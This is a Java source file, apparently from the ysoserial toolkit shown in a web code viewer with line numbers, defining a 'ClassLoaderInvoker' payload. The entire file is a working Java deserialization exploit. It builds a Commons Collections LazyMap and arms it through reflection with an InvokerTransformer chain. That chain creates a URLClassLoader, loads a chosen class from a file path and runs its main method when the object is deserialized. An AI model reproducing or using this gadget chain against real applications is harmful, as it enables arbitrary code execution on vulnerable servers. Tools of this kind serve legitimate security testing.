Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
package ysoserial.payloads;
2

3
import java.lang.reflect.InvocationHandler;
4
import java.net.URL;
5
import java.net.URLClassLoader;
6
import java.util.HashMap;
7
import java.util.Map;
8

9
import org.apache.commons.collections.Transformer;
10
import org.apache.commons.collections.functors.ChainedTransformer;
11
import org.apache.commons.collections.functors.ConstantTransformer;
12
import org.apache.commons.collections.functors.InvokerTransformer;
13
import org.apache.commons.collections.map.LazyMap;
14

15
import ysoserial.payloads.annotation.Dependencies;
16
import ysoserial.payloads.util.Gadgets;
17
import ysoserial.payloads.util.PayloadRunner;
18
import ysoserial.payloads.util.Reflections;
19

20
/*								
21
	Requires:
22
		commons-collections
23
 */
24
@SuppressWarnings({"rawtypes", "unchecked"})
25
@Dependencies({"commons-collections:commons-collections:3.1"})
26
public class ClassLoaderInvoker extends PayloadRunner implements ObjectPayload<InvocationHandler> {
27
	
28
	public InvocationHandler getObject(final String command) throws Exception {
29
		final String fileName = command.split(" ")[0];
30
		final String clazzName = command.split(" ")[1];
31
		final URL[] urlArray = new URL[]{ new URL("file://" + fileName)};
32
		// inert chain for setup
33
		final Transformer transformerChain = new ChainedTransformer(
34
			new Transformer[]{ new ConstantTransformer(1) });
35
		// real chain for after setup
36
		final Transformer[] transformers = new Transformer[] {
37
				new ConstantTransformer(URLClassLoader.class),
38
				new InvokerTransformer("getMethod", new Class[] {
39
						String.class, Class[].class }, new Object[] {
40
						"newInstance", new Class[]{ URL[].class }}),
41
				new InvokerTransformer("invoke", new Class[] {
42
						Object.class, Object[].class }, new Object[] {
43
						null, new Object[]{ urlArray } }),
44
				new InvokerTransformer("loadClass", new Class[] {
45
					String.class}, new Object[] { clazzName }),
46
				new InvokerTransformer("getMethod", new Class[] {
47
						String.class, Class[].class }, new Object[] {
48
						"main", new Class[]{String[].class} }),
49
				new InvokerTransformer("invoke", new Class[] {
50
					Object.class, Object[].class }, new Object[] {
51
					null, new Object[]{ new String[]{} } }),
52
				new ConstantTransformer(1) };
53

54
		final Map innerMap = new HashMap();
55

56
		final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
57
		
58
		final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
59
		
60
		final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
61
		
62
		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain	
63
				
64
		return handler;
65
	}
66
	
67
	public static void main(final String[] args) throws Exception {
68
		PayloadRunner.run(ClassLoaderInvoker.class, args);
69
	}
70
}
71

72